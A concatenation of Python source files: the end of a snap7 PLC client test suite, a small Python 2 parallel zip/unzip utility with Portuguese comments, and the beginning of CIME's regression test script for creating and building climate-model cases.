self.assertRaises(Exception, self.client.set_param,
snap7.types.RemotePort, 1)
def test_get_param(self):
expected = (
(snap7.types.RemotePort, tcpport),
(snap7.types.PingTimeout, 750),
(snap7.types.SendTimeout, 10),
(snap7.types.RecvTimeout, 3000),
(snap7.types.SrcRef, 256),
(snap7.types.DstRef, 0),
(snap7.types.SrcTSap, 4096),
(snap7.types.PDURequest, 480),
)
for param, value in expected:
self.assertEqual(self.client.get_param(param), value)
non_client = (snap7.types.LocalPort, snap7.types.WorkInterval, snap7.types.MaxClients,
snap7.types.BSendTimeout, snap7.types.BRecvTimeout, snap7.types.RecoveryTime,
snap7.types.KeepAliveTime)
# invalid param for client
for param in non_client:
self.assertRaises(Exception, self.client.get_param, non_client)
class TestClientBeforeConnect(unittest.TestCase):
"""
Test suite of items that should run without an open connection.
"""
def setUp(self):
self.client = snap7.client.Client()
def test_set_param(self):
values = (
(snap7.types.RemotePort, 1102),
(snap7.types.PingTimeout, 800),
(snap7.types.SendTimeout, 15),
(snap7.types.RecvTimeout, 3500),
(snap7.types.SrcRef, 128),
(snap7.types.DstRef, 128),
(snap7.types.SrcTSap, 128),
(snap7.types.PDURequest, 470),
)
for param, value in values:
self.client.set_param(param, value)
if __name__ == '__main__':
unittest.main()
|
pzip.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
from multiprocessing import Process, Value, Lock
from threading import Semaphore, Thread
import zipfile
import argparse
import time
def pyzip(args, t=False):
global count
if t == True:
try:
while count.value < len(args):
mutex.acquire()
files = args[count.value]
count.value += 1
mutex.release()
if os.path.isfile(files):
with zipfile.ZipFile(files+'.zip', mode='w') as zf:
zf.write(files)
else:
raise IOError
except:
print 'File doesn\'t exist'
sys.exit()
else:
while count.value < len(args):
mutex.acquire()
files = args[count.value]
count.value += 1
mutex.release()
if os.path.isfile(files):
with zipfile.ZipFile(files+'.zip', mode='w') as zf:
zf.write(files)
def pyunzip(args, t=False):
global count
if t == True:
try:
while count.value < len(args):
mutex.acquire()
files = args[count.value]
count.value += 1
mutex.release()
if os.path.isfile(files):
with zipfile.ZipFile(files) as zf:
zf.extractall()
else:
raise IOError
except:
print 'File doesn\'t exist'
sys.exit()
else:
while count.value < len(args):
# zona critica
mutex.acquire()
files = args[count.value]
count.value += 1
mutex.release()
#--------------
if os.path.isfile(files):
with zipfile.ZipFile(files) as zf:
zf.extractall()
if __name__ == '__main__':
# argumentos a utilizar
parser = argparse.ArgumentParser(prog='pzip', description='Zip or unzip files')
parser.add_argument('-c', action='store_const', dest='pyzip', const=True)
parser.add_argument('-d', action='store_const', dest='pyunzip', const=True)
parser.add_argument('-p', metavar='n', nargs='?', action='append', dest='process', const=True)
parser.add_argument('-t', action='store_const', dest='targ', const=True)
parser.add_argument('{ficheiros}', nargs='*')
args = parser.parse_args()
count = Value('i', 0)
start_time = time.time()
#lista dos processos
processes = []
mutex = Lock()
#verificação de argumentos
if args.pyzip == True and args.pyunzip == None:
if args.process:
if args.targ:
listArgs = [elem for elem in sys.argv[5:]]
if len(listArgs) == 0:
end = 'y'
while end != 'n':
i_files = raw_input('What file do you want to unzip? ')
listArgs.append(i_files)
end = raw_input('Do you have more files(y, n)? ')
else:
listArgs = [elem for elem in sys.argv[4:]]
if len(listArgs) == 0:
end = 'y'
while end != 'n':
i_files = raw_input('What file do you want to unzip? ')
listArgs.append(i_files)
end = raw_input('Do you have more files(y, n)? ')
for i in range(int(sys.argv[3])):
if args.targ:
t = True
newT = Process(target=pyzip, args=(listArgs, t,))
newT.start()
else:
newT = Process(target=pyzip, args=(listArgs,))
newT.start()
processes.append(newT)
for p in processes:
p.join()
else:
if args.targ:
listArgs = [elem for elem in sys.argv[3:]]
if len(listArgs) == 0:
end = 'y'
while end != 'n':
i_files = raw_input('What file do you want to unzip? ')
listArgs.append(i_files)
end = raw_input('Do you have more files(y, n)? ')
t = True
pyzip(listArgs, t)
else:
listArgs = [elem for elem in sys.argv[2:]]
if len(listArgs) == 0:
end = 'y'
while end != 'n':
i_files = raw_input('What file do you want to zip? ')
listArgs.append(i_files)
end = raw_input('Do you have more files(y, n)? ')
pyzip(listArgs)
else:
pyzip(listArgs)
print 'Foram zippados',count.value,'ficheiros'
print 'Tempo de execução: ',time.time() - start_time,'segundos'
if args.pyunzip == True and args.pyzip == None:
if args.process:
if args.targ:
listArgs = [elem for elem in sys.argv[5:]]
if len(listArgs) == 0:
end = 'y'
while end != 'n':
i_files = raw_input('What file do you want to unzip? ')
listArgs.append(i_files)
end = raw_input('Do you have more files(y, n)? ')
else:
listArgs=[elem for elem in sys.argv[4:]]
if len(listArgs) == 0:
end = 'y'
while end != 'n':
i_files = raw_input('What file do you want to unzip? ')
listArgs.append(i_files)
end = raw_input('Do you have more files(y, n)? ')
for i in range(int(sys.argv[3])):
if args.targ:
t = True
newT = Process(target=pyunzip, args=(listArgs,t,))
new.start()
else:
newT = Process(target=pyunzip, args=(listArgs,))
newT.start()
processes.append(newT)
for p in processes:
p.join()
else:
if args.targ:
listArgs = [elem for elem in sys.argv[2:]]
if len(listArgs) == 0:
end = 'y'
while end != 'n':
i_files = raw_input('What file do you want to unzip? ')
listArgs.append(i_files)
end = raw_input('Do you have more files(y, n)? ')
t = True
pyunzip(listArgs, t)
else:
t = True
pyunzip(listArgs, t)
else:
listArgs = [elem for elem in sys.argv[2:]]
if len(listArgs) == 0:
end = 'y'
while end != 'n':
i_files = raw_input('What file do you want to unzip? ')
listArgs.append(i_files)
end = raw_input('Do you have more files(y, n)? ')
pyunzip(listArgs)
else:
pyunzip(listArgs)
print 'Foram unzippados',count.value,'ficheiros'
print 'Tempo de execução: ',time.time() - start_time,'segundos'
if args.pyzip == True and args.pyunzip == True:
parser.error("-c and -d can't be used with eachother.")
|
scripts_regression_tests.py
|
#!/usr/bin/env python
"""
Script containing CIME python regression test suite. This suite should be run
to confirm overall CIME correctness.
"""
import glob, os, re, shutil, signal, sys, tempfile, \
threading, time, logging, unittest, getpass, \
filecmp, time, atexit
from xml.etree.ElementTree import ParseError
LIB_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)),"..","lib")
sys.path.append(LIB_DIR)
# Remove all pyc files to ensure we're testing the right things
import subprocess, argparse
subprocess.call('/bin/rm -f $(find . -name "*.pyc")', shell=True, cwd=LIB_DIR)
import six
from six import assertRaisesRegex
import stat as osstat
import collections
from CIME.utils import run_cmd, run_cmd_no_fail, get_lids, get_current_commit, safe_copy, CIMEError, get_cime_root
import get_tests
import CIME.test_scheduler, CIME.wait_for_tests
from CIME.test_scheduler import TestScheduler
from CIME.XML.compilers import Compilers
from CIME.XML.env_run import EnvRun
from CIME.XML.machines import Machines
from CIME.XML.files import Files
from CIME.case import Case
from CIME.code_checker import check_code, get_all_checkable_files
from CIME.test_status import *
SCRIPT_DIR = CIME.utils.get_scripts_root()
TOOLS_DIR = os.path.join(SCRIPT_DIR,"Tools")
TEST_COMPILER = None
GLOBAL_TIMEOUT = None
TEST_MPILIB = None
MACHINE = None
FAST_ONLY = False
NO_BATCH = False
NO_CMAKE = False
TEST_ROOT = None
NO_TEARDOWN = False
os.environ["CIME_GLOBAL_WALLTIME"] = "0:05:00"
# pragma pylint: disable=protected-access
###############################################################################
def run_cmd_assert_result(test_obj, cmd, from_dir=None, expected_stat=0, env=None, verbose=False):
###############################################################################
from_dir = os.getcwd() if from_dir is None else from_dir
stat, output, errput = run_cmd(cmd, from_dir=from_dir, env=env, verbose=verbose)
if expected_stat == 0:
expectation = "SHOULD HAVE WORKED, INSTEAD GOT STAT %s" % stat
else:
expectation = "EXPECTED STAT %s, INSTEAD GOT STAT %s" % (expected_stat, stat)
msg = \
"""
COMMAND: %s
FROM_DIR: %s
%s
OUTPUT: %s
ERRPUT: %s
""" % (cmd, from_dir, expectation, output, errput)
test_obj.assertEqual(stat, expected_stat, msg=msg)
return output
###############################################################################
def assert_test_status(test_obj, test_name, test_status_obj, test_phase, expected_stat):
###############################################################################
test_status = test_status_obj.get_status(test_phase)
test_obj.assertEqual(test_status, expected_stat, msg="Problem with {}: for phase '{}': has status '{}', expected '{}'".format(test_name, test_phase, test_status, expected_stat))
###############################################################################
def verify_perms(test_obj, root_dir):
###############################################################################
for root, dirs, files in os.walk(root_dir):
for filename in files:
full_path = os.path.join(root, filename)
st = os.stat(full_path)
test_obj.assertTrue(st.st_mode & osstat.S_IWGRP, msg="file {} is not group writeable".format(full_path))
test_obj.assertTrue(st.st_mode & osstat.S_IRGRP, msg="file {} is not group readable".format(full_path))
test_obj.assertTrue(st.st_mode & osstat.S_IROTH, msg="file {} is not world readable".format(full_path))
for dirname in dirs:
full_path = os.path.join(root, dirname)
st = os.stat(full_path)
test_obj.assertTrue(st.st_mode & osstat.S_IWGRP, msg="dir {} is not group writable".format(full_path))
test_obj.assertTrue(st.st_mode & osstat.S_IRGRP, msg="dir {} is not group readable".format(full_path))
test_obj.assertTrue(st.st_mode & osstat.S_IXGRP, msg="dir {} is not group executable".format(full_path))
test_obj.assertTrue(st.st_mode & osstat.S_IROTH, msg="dir {} is not world readable".format(full_path))
test_obj.assertTrue(st.st_mode & osstat.S_IXOTH, msg="dir {} is not world executable".format(full_path))
###############################################################################
class A_RunUnitTests(unittest.TestCase):
###############################################################################
def test_resolve_variable_name(self):
files = Files()
machinefile = files.get_value("MACHINES_SPEC_FILE")
self.assertTrue(os.path.isfile(machinefile),
msg="Path did not resolve to existing file %s" % machinefile)
def test_unittests(self):
# Finds all files contained in CIME/tests or its subdirectories that
# match the pattern 'test*.py', and runs the unit tests found there
# (i.e., tests defined using python's unittest module).
#
# This is analogous to running:
# python -m unittest discover -s CIME/tests -t .
# from cime/scripts/lib
#
# Yes, that means we have a bunch of unit tests run from this one unit
# test.
testsuite = unittest.defaultTestLoader.discover(
start_dir = os.path.join(LIB_DIR,"CIME","tests"),
pattern = 'test*.py',
top_level_dir = LIB_DIR)
testrunner = unittest.TextTestRunner(buffer=False)
# Disable logging; otherwise log messages written by code under test
# clutter the unit test output
log_lvl = logging.getLogger().getEffectiveLevel()
logging.disable(logging.CRITICAL)
try:
results = testrunner.run(testsuite)
finally:
logging.getLogger().setLevel(log_lvl)
self.assertTrue(results.wasSuccessful())
def test_lib_doctests(self):
# Find and run all the doctests in the lib directory tree
skip_list = ["six.py", "CIME/SystemTests/mvk.py", "CIME/SystemTests/pgn.py"]
for root, _, files in os.walk(LIB_DIR):
for file_ in files:
filepath = os.path.join(root, file_)[len(LIB_DIR)+1:]
if filepath.endswith(".py") and filepath not in skip_list:
with open(os.path.join(root, file_)) as fd:
content = fd.read()
if '>>>' in content:
print("Running doctests for {}".format(filepath))
run_cmd_assert_result(self, 'PYTHONPATH={}:$PYTHONPATH python -m doctest {} 2>&1'.format(LIB_DIR, filepath), from_dir=LIB_DIR)
else:
print("{} has no doctests".format(filepath))
###############################################################################
def make_fake_teststatus(path, testname, status, phase):
###############################################################################
expect(phase in CORE_PHASES, "Bad phase '%s'" % phase)
with TestStatus(test_dir=path, test_name=testname) as ts:
for core_phase in CORE_PHASES:
if core_phase == phase:
ts.set_status(core_phase, status, comments=("time=42" if phase == RUN_PHASE else ""))
break
else:
ts.set_status(core_phase, TEST_PASS_STATUS, comments=("time=42" if phase == RUN_PHASE else ""))
###############################################################################
def parse_test_status(line):
###############################################################################
regex = re.compile(r"Test '(\w+)' finished with status '(\w+)'")
m = regex.match(line)
return m.groups()
###############################################################################
def kill_subprocesses(name=None, sig=signal.SIGKILL, expected_num_killed=None, tester=None):
###############################################################################
# Kill all subprocesses
proc_ids = CIME.utils.find_proc_id(proc_name=name, children_only=True)
if (expected_num_killed is not None):
tester.assertEqual(len(proc_ids), expected_num_killed,
msg="Expected to find %d processes to kill, found %d" % (expected_num_killed, len(proc_ids)))
for proc_id in proc_ids:
try:
os.kill(proc_id, sig)
except OSError:
pass
###############################################################################
def kill_python_subprocesses(sig=signal.SIGKILL, expected_num_killed=None, tester=None):
###############################################################################
kill_subprocesses("[Pp]ython", sig, expected_num_killed, tester)
###########################################################################
def assert_dashboard_has_build(tester, build_name, expected_count=1):
###########################################################################
# Do not test E3SM dashboard if model is CESM
if CIME.utils.get_model() == "e3sm":
time.sleep(10) # Give chance for cdash to update
wget_file = tempfile.mktemp()
run_cmd_no_fail("wget https://my.cdash.org/api/v1/index.php?project=ACME_test --no-check-certificate -O %s" % wget_file)
raw_text = open(wget_file, "r").read()
os.remove(wget_file)
num_found = raw_text.count(build_name)
tester.assertEqual(num_found, expected_count,
msg="Dashboard did not have expected num occurances of build name '%s'. Expected %s, found %s" % (build_name, expected_count, num_found))
###############################################################################
def setup_proxy():
###############################################################################
if ("http_proxy" not in os.environ):
proxy = MACHINE.get_value("PROXY")
if (proxy is not None):
os.environ["http_proxy"] = proxy
return True
return False
###############################################################################
class N_TestUnitTest(unittest.TestCase):
###############################################################################
@classmethod
def setUpClass(cls):
cls._do_teardown = []
cls._testroot = os.path.join(TEST_ROOT, 'TestUnitTests')
cls._testdirs = []
def _has_unit_test_support(self):
if TEST_COMPILER is None:
default_compiler = MACHINE.get_default_compiler()
compiler = Compilers(MACHINE, compiler=default_compiler)
else:
compiler = Compilers(MACHINE, compiler=TEST_COMPILER)
attrs = {'MPILIB': 'mpi-serial', 'compile_threaded': 'FALSE'}
pfunit_path = compiler.get_optional_compiler_node("PFUNIT_PATH",
attributes=attrs)
if pfunit_path is None:
return False
else:
return True
def test_a_unit_test(self):
cls = self.__class__
if not self._has_unit_test_support():
self.skipTest("Skipping TestUnitTest - PFUNIT_PATH not found for the default compiler on this machine")
test_dir = os.path.join(cls._testroot,"unit_tester_test")
cls._testdirs.append(test_dir)
os.makedirs(test_dir)
unit_test_tool = os.path.abspath(os.path.join(get_cime_root(),"scripts","fortran_unit_testing","run_tests.py"))
test_spec_dir = os.path.join(os.path.dirname(unit_test_tool),"Examples", "interpolate_1d", "tests")
args = "--build-dir {} --test-spec-dir {}".format(test_dir, test_spec_dir)
args += " --machine {}".format(MACHINE.get_machine_name())
run_cmd_no_fail("{} {}".format(unit_test_tool, args))
cls._do_teardown.append(test_dir)
def test_b_cime_f90_unit_tests(self):
cls = self.__class__
if (FAST_ONLY):
self.skipTest("Skipping slow test")
if not self._has_unit_test_support():
self.skipTest("Skipping TestUnitTest - PFUNIT_PATH not found for the default compiler on this machine")
test_dir = os.path.join(cls._testroot,"driver_f90_tests")
cls._testdirs.append(test_dir)
os.makedirs(test_dir)
test_spec_dir = get_cime_root()
unit_test_tool = os.path.abspath(os.path.join(test_spec_dir,"scripts","fortran_unit_testing","run_tests.py"))
args = "--build-dir {} --test-spec-dir {}".format(test_dir, test_spec_dir)
args += " --machine {}".format(MACHINE.get_machine_name())
run_cmd_no_fail("{} {}".format(unit_test_tool, args))
cls._do_teardown.append(test_dir)
@classmethod
def tearDownClass(cls):
do_teardown = len(cls._do_teardown) > 0 and sys.exc_info() == (None, None, None) and not NO_TEARDOWN
teardown_root = True
for tfile in cls._testdirs:
if tfile not in cls._do_teardown:
print("Detected failed test or user request no teardown")
print("Leaving case directory : %s"%tfile)
teardown_root = False
elif do_teardown:
shutil.rmtree(tfile)
if teardown_root and do_teardown:
shutil.rmtree(cls._testroot)
###############################################################################
class J_TestCreateNewcase(unittest.TestCase):
###############################################################################
@classmethod
def setUpClass(cls):
cls._testdirs = []
cls._do_teardown = []
cls._testroot = os.path.join(TEST_ROOT, 'TestCreateNewcase')
def test_a_createnewcase(self):
cls = self.__class__
testdir = os.path.join(cls._testroot, 'testcreatenewcase')
if os.path.exists(testdir):
shutil.rmtree(testdir)
args = " --case %s --compset X --output-root %s --handle-preexisting-dirs=r " % (testdir, cls._testroot)
if TEST_COMPILER is not None:
args = args + " --compiler %s"%TEST_COMPILER
if TEST_MPILIB is not None:
args = args + " --mpilib %s"%TEST_MPILIB
if CIME.utils.get_cime_default_driver() == "nuopc":
args += " --res f19_g17 "
else:
args += " --res f19_g16 "
cls._testdirs.append(testdir)
run_cmd_assert_result(self, "./create_newcase %s"%(args), from_dir=SCRIPT_DIR)
self.assertTrue(os.path.exists(testdir))
self.assertTrue(os.path.exists(os.path.join(testdir, "case.setup")))
run_cmd_assert_result(self, "./case.setup", from_dir=testdir)
run_cmd_assert_result(self, "./case.build", from_dir=testdir)
with Case(testdir, read_only=False) as case:
ntasks = case.get_value("NTASKS_ATM")
case.set_value("NTASKS_ATM", ntasks+1)
# this should fail with a locked file issue
run_cmd_assert_result(self, "./case.build",
from_dir=testdir, expected_stat=1)
run_cmd_assert_result(self, "./case.setup --reset", from_dir=testdir)
run_cmd_assert_result(self, "./case.build", from_dir=testdir)
with Case(testdir, read_only=False) as case:
case.set_value("CHARGE_ACCOUNT", "fred")
# this should not fail with a locked file issue
run_cmd_assert_result(self, "./case.build", from_dir=testdir)
run_cmd_assert_result(self, "./case.st_archive --test-all", from_dir=testdir)
# Trying to set values outside of context manager should fail
case = Case(testdir, read_only=False)
with self.assertRaises(CIMEError):
case.set_value("NTASKS_ATM", 42)
# Trying to read_xml with pending changes should fail
with self.assertRaises(CIMEError):
with Case(testdir, read_only=False) as case:
case.set_value("CHARGE_ACCOUNT", "fouc")
case.read_xml()
cls._do_teardown.append(testdir)
def test_aa_no_flush_on_instantiate(self):
testdir = os.path.join(self.__class__._testroot, 'testcreatenewcase')
with Case(testdir, read_only=False) as case:
for env_file in case._files:
self.assertFalse(env_file.needsrewrite, msg="Instantiating a case should not trigger a flush call")
with Case(testdir, read_only=False) as case:
case.set_value("HIST_OPTION","nyears")
runfile = case.get_env('run')
self.assertTrue(runfile.needsrewrite, msg="Expected flush call not triggered")
for env_file in case._files:
if env_file != runfile:
self.assertFalse(env_file.needsrewrite, msg="Unexpected flush triggered for file {}"
.format(env_file.filename))
# Flush the file
runfile.write()
# set it again to the same value
case.set_value("HIST_OPTION","nyears")
# now the file should not need to be flushed
for env_file in case._files:
self.assertFalse(env_file.needsrewrite, msg="Unexpected flush triggered for file {}"
.format(env_file.filename))
# Check once more with a new instance
with Case(testdir, read_only=False) as case:
case.set_value("HIST_OPTION","nyears")
for env_file in case._files:
self.assertFalse(env_file.needsrewrite, msg="Unexpected flush triggered for file {}"
.format(env_file.filename))
def test_b_user_mods(self):
cls = self.__class__
testdir = os.path.join(cls._testroot, 'testusermods')
if os.path.exists(testdir):
shutil.rmtree(testdir)
cls._testdirs.append(testdir)
user_mods_dir = os.path.join(CIME.utils.get_python_libs_root(), "..", "tests", "user_mods_test1")
args = " --case %s --compset X --user-mods-dir %s --output-root %s --handle-preexisting-dirs=r"% (testdir, user_mods_dir, cls._testroot)
if TEST_COMPILER is not None:
args = args + " --compiler %s"%TEST_COMPILER
if TEST_MPILIB is not None:
args = args + " --mpilib %s"%TEST_MPILIB
if CIME.utils.get_cime_default_driver() == "nuopc":
args += " --res f19_g17 "
else:
args += " --res f19_g16 "
run_cmd_assert_result(self, "%s/create_newcase %s "
% (SCRIPT_DIR, args),from_dir=SCRIPT_DIR)
self.assertTrue(os.path.isfile(os.path.join(testdir,"SourceMods","src.drv","somefile.F90")), msg="User_mods SourceMod missing")
with open(os.path.join(testdir,"user_nl_cpl"),"r") as fd:
contents = fd.read()
self.assertTrue("a different cpl test option" in contents, msg="User_mods contents of user_nl_cpl missing")
self.assertTrue("a cpl namelist option" in contents, msg="User_mods contents of user_nl_cpl missing")
cls._do_teardown.append(testdir)
def test_c_create_clone_keepexe(self):
cls = self.__class__
testdir = os.path.join(cls._testroot, 'test_create_clone_keepexe')
if os.path.exists(testdir):
shutil.rmtree(testdir)
prevtestdir = cls._testdirs[0]
user_mods_dir = os.path.join(CIME.utils.get_python_libs_root(), "..", "tests", "user_mods_test3")
cmd = "%s/create_clone --clone %s --case %s --keepexe --user-mods-dir %s" \
% (SCRIPT_DIR, prevtestdir, testdir, user_mods_dir)
run_cmd_assert_result(self, cmd, from_dir=SCRIPT_DIR, expected_stat=1)
cls._do_teardown.append(testdir)
def test_d_create_clone_new_user(self):
cls = self.__class__
testdir = os.path.join(cls._testroot, 'test_create_clone_new_user')
if os.path.exists(testdir):
shutil.rmtree(testdir)
prevtestdir = cls._testdirs[0]
cls._testdirs.append(testdir)
# change the USER and CIME_OUTPUT_ROOT to nonsense values
# this is intended as a test of whether create_clone is independent of user
run_cmd_assert_result(self, "./xmlchange USER=this_is_not_a_user",
from_dir=prevtestdir)
fakeoutputroot = cls._testroot.replace(os.environ.get("USER"), "this_is_not_a_user")
run_cmd_assert_result(self, "./xmlchange CIME_OUTPUT_ROOT=%s"%fakeoutputroot,
from_dir=prevtestdir)
# this test should pass (user name is replaced)
run_cmd_assert_result(self, "%s/create_clone --clone %s --case %s " %
(SCRIPT_DIR, prevtestdir, testdir),from_dir=SCRIPT_DIR)
shutil.rmtree(testdir)
# this test should pass
run_cmd_assert_result(self, "%s/create_clone --clone %s --case %s --cime-output-root %s" %
(SCRIPT_DIR, prevtestdir, testdir, cls._testroot),from_dir=SCRIPT_DIR)
cls._do_teardown.append(testdir)
def test_dd_create_clone_not_writable(self):
cls = self.__class__
testdir = os.path.join(cls._testroot, 'test_create_clone_not_writable')
if os.path.exists(testdir):
shutil.rmtree(testdir)
prevtestdir = cls._testdirs[0]
cls._testdirs.append(testdir)
with Case(prevtestdir, read_only=False) as case1:
case2 = case1.create_clone(testdir)
with self.assertRaises(CIMEError):
case2.set_value("CHARGE_ACCOUNT", "fouc")
cls._do_teardown.append(testdir)
def test_e_xmlquery(self):
# Set script and script path
xmlquery = "./xmlquery"
cls = self.__class__
casedir = cls._testdirs[0]
# Check for environment
self.assertTrue(os.path.isdir(SCRIPT_DIR))
self.assertTrue(os.path.isdir(TOOLS_DIR))
self.assertTrue(os.path.isfile(os.path.join(casedir,xmlquery)))
# Test command line options
with Case(casedir, read_only=True) as case:
STOP_N = case.get_value("STOP_N")
COMP_CLASSES = case.get_values("COMP_CLASSES")
BUILD_COMPLETE = case.get_value("BUILD_COMPLETE")
cmd = xmlquery + " STOP_N --value"
output = run_cmd_no_fail(cmd, from_dir=casedir)
self.assertTrue(output == str(STOP_N), msg="%s != %s"%(output, STOP_N))
cmd = xmlquery + " BUILD_COMPLETE --value"
output = run_cmd_no_fail(cmd, from_dir=casedir)
self.assertTrue(output == "TRUE", msg="%s != %s"%(output, BUILD_COMPLETE))
# we expect DOCN_MODE to be undefined in this X compset
# this test assures that we do not try to resolve this as a compvar
cmd = xmlquery + " DOCN_MODE --value"
_, output, error = run_cmd(cmd, from_dir=casedir)
self.assertTrue(error == "ERROR: No results found for variable DOCN_MODE",
msg="unexpected result for DOCN_MODE, output {}, error {}".
format(output, error))
for comp in COMP_CLASSES:
caseresult = case.get_value("NTASKS_%s"%comp)
cmd = xmlquery + " NTASKS_%s --value"%comp
output = run_cmd_no_fail(cmd, from_dir=casedir)
self.assertTrue(output == str(caseresult), msg="%s != %s"%(output, caseresult))
cmd = xmlquery + " NTASKS --subgroup %s --value"%comp
output = run_cmd_no_fail(cmd, from_dir=casedir)
self.assertTrue(output == str(caseresult), msg="%s != %s"%(output, caseresult))
if MACHINE.has_batch_system():
JOB_QUEUE = case.get_value("JOB_QUEUE", subgroup="case.run")
cmd = xmlquery + " JOB_QUEUE --subgroup case.run --value"
output = run_cmd_no_fail(cmd, from_dir=casedir)
self.assertTrue(output == JOB_QUEUE, msg="%s != %s"%(output, JOB_QUEUE))
cmd = xmlquery + " --listall"
run_cmd_no_fail(cmd, from_dir=casedir)
cls._do_teardown.append(cls._testroot)
def test_f_createnewcase_with_user_compset(self):
cls = self.__class__
testdir = os.path.join(cls._testroot, 'testcreatenewcase_with_user_compset')
if os.path.exists(testdir):
shutil.rmtree(testdir)
cls._testdirs.append(testdir)
pesfile = os.path.join("..","src","drivers","mct","cime_config","config_pes.xml")
args = "--case %s --compset 2000_SATM_XLND_SICE_SOCN_XROF_XGLC_SWAV --pesfile %s --res f19_g16 --output-root %s --handle-preexisting-dirs=r" % (testdir, pesfile, cls._testroot)
if CIME.utils.get_model() == "cesm":
args += " --run-unsupported"
if TEST_COMPILER is not None:
args += " --compiler %s"%TEST_COMPILER
if TEST_MPILIB is not None:
args = args + " --mpilib %s"%TEST_MPILIB
run_cmd_assert_result(self, "%s/create_newcase %s"%(SCRIPT_DIR, args), from_dir=SCRIPT_DIR)
run_cmd_assert_result(self, "./case.setup", from_dir=testdir)
run_cmd_assert_result(self, "./case.build", from_dir=testdir)
cls._do_teardown.append(testdir)
def test_g_createnewcase_with_user_compset_and_env_mach_pes(self):
cls = self.__class__
testdir = os.path.join(cls._testroot, 'testcreatenewcase_with_user_compset_and_env_mach_pes')
if os.path.exists(testdir):
shutil.rmtree(testdir)
previous_testdir = cls._testdirs[-1]
cls._testdirs.append(testdir)
pesfile = os.path.join(previous_testdir,"env_mach_pes.xml")
args = "--case %s --compset 2000_SATM_XLND_SICE_SOCN_XROF_XGLC_SWAV --pesfile %s --res f19_g16 --output-root %s --handle-preexisting-dirs=r" % (testdir, pesfile, cls._testroot)
if CIME.utils.get_model() == "cesm":
args += " --run-unsupported"
if TEST_COMPILER is not None:
args += " --compiler %s"%TEST_COMPILER
if TEST_MPILIB is not None:
args += " --mpilib %s"%TEST_MPILIB
run_cmd_assert_result(self, "%s/create_newcase %s"%(SCRIPT_DIR, args), from_dir=SCRIPT_DIR)
run_cmd_assert_result(self, "diff env_mach_pes.xml %s"%(previous_testdir), from_dir=testdir)
# this line should cause the diff to fail (I assume no machine is going to default to 17 tasks)
run_cmd_assert_result(self, "./xmlchange NTASKS=17", from_dir=testdir)
run_cmd_assert_result(self, "diff env_mach_pes.xml %s"%(previous_testdir), from_dir=testdir,
expected_stat=1)
cls._do_teardown.append(testdir)
def test_h_primary_component(self):
cls = self.__class__
testdir = os.path.join(cls._testroot, 'testprimarycomponent')
if os.path.exists(testdir):
shutil.rmtree(testdir)
cls._testdirs.append(testdir)
args = " --case CreateNewcaseTest --script-root %s --compset X --output-root %s --handle-preexisting-dirs u" % (testdir, cls._testroot)
if TEST_COMPILER is not None:
args += " --compiler %s"%TEST_COMPILER
if TEST_MPILIB is not None:
args += " --mpilib %s"%TEST_MPILIB
if CIME.utils.get_cime_default_driver() == "nuopc":
args += " --res f19_g17 "
else:
args += " --res f19_g16 "
run_cmd_assert_result(self, "%s/create_newcase %s" % (SCRIPT_DIR, args), from_dir=SCRIPT_DIR)
self.assertTrue(os.path.exists(testdir))
self.assertTrue(os.path.exists(os.path.join(testdir, "case.setup")))
with Case(testdir, read_only=False) as case:
case._compsetname = case.get_value("COMPSET")
case.set_comp_classes(case.get_values("COMP_CLASSES"))
primary = case._find_primary_component()
self.assertEqual(primary, "drv", msg="primary component test expected drv but got %s"%primary)
# now we are going to corrupt the case so that we can do more primary_component testing
case.set_valid_values("COMP_GLC","%s,fred"%case.get_value("COMP_GLC"))
case.set_value("COMP_GLC","fred")
primary = case._find_primary_component()
self.assertEqual(primary, "fred", msg="primary component test expected fred but got %s"%primary)
case.set_valid_values("COMP_ICE","%s,wilma"%case.get_value("COMP_ICE"))
case.set_value("COMP_ICE","wilma")
primary = case._find_primary_component()
self.assertEqual(primary, "wilma", msg="primary component test expected wilma but got %s"%primary)
case.set_valid_values("COMP_OCN","%s,bambam,docn"%case.get_value("COMP_OCN"))
case.set_value("COMP_OCN","bambam")
primary = case._find_primary_component()
self.assertEqual(primary, "bambam", msg="primary component test expected bambam but got %s"%primary)
case.set_valid_values("COMP_LND","%s,barney"%case.get_value("COMP_LND"))
case.set_value("COMP_LND","barney")
primary = case._find_primary_component()
# This is a "J" compset
self.assertEqual(primary, "allactive", msg="primary component test expected allactive but got %s"%primary)
case.set_value("COMP_OCN","docn")
case.set_valid_values("COMP_LND","%s,barney"%case.get_value("COMP_LND"))
case.set_value("COMP_LND","barney")
primary = case._find_primary_component()
self.assertEqual(primary, "barney", msg="primary component test expected barney but got %s"%primary)
case.set_valid_values("COMP_ATM","%s,wilma"%case.get_value("COMP_ATM"))
case.set_value("COMP_ATM","wilma")
primary = case._find_primary_component()
self.assertEqual(primary, "wilma", msg="primary component test expected wilma but got %s"%primary)
# this is a "E" compset
case._compsetname = case._compsetname.replace("XOCN","DOCN%SOM")
primary = case._find_primary_component()
self.assertEqual(primary, "allactive", msg="primary component test expected allactive but got %s"%primary)
# finally a "B" compset
case.set_value("COMP_OCN","bambam")
primary = case._find_primary_component()
self.assertEqual(primary, "allactive", msg="primary component test expected allactive but got %s"%primary)
cls._do_teardown.append(testdir)
def test_j_createnewcase_user_compset_vs_alias(self):
"""
Create a compset using the alias and another compset using the full compset name
and make sure they are the same by comparing the namelist files in CaseDocs.
Ignore the modelio files and clean the directory names out first.
"""
cls = self.__class__
testdir1 = os.path.join(cls._testroot, 'testcreatenewcase_user_compset')
if os.path.exists(testdir1):
shutil.rmtree(testdir1)
cls._testdirs.append(testdir1)
args = ' --case CreateNewcaseTest --script-root {} --compset 2000_DATM%NYF_SLND_SICE_DOCN%SOMAQP_SROF_SGLC_SWAV --res f19_g16 --output-root {} --handle-preexisting-dirs u' .format(testdir1, cls._testroot)
if CIME.utils.get_model() == "cesm":
args += " --run-unsupported"
if TEST_COMPILER is not None:
args += " --compiler %s"%TEST_COMPILER
if TEST_MPILIB is not None:
args += " --mpilib %s"%TEST_MPILIB
run_cmd_assert_result(self, "{}/create_newcase {}" .format (SCRIPT_DIR, args), from_dir=SCRIPT_DIR)
run_cmd_assert_result(self, "./case.setup ", from_dir=testdir1)
run_cmd_assert_result(self, "./preview_namelists ", from_dir=testdir1)
dir1 = os.path.join(testdir1,"CaseDocs")
dir2 = os.path.join(testdir1,"CleanCaseDocs")
os.mkdir(dir2)
for _file in os.listdir(dir1):
if "modelio" in _file:
continue
with open(os.path.join(dir1,_file),"r") as fi:
file_text = fi.read()
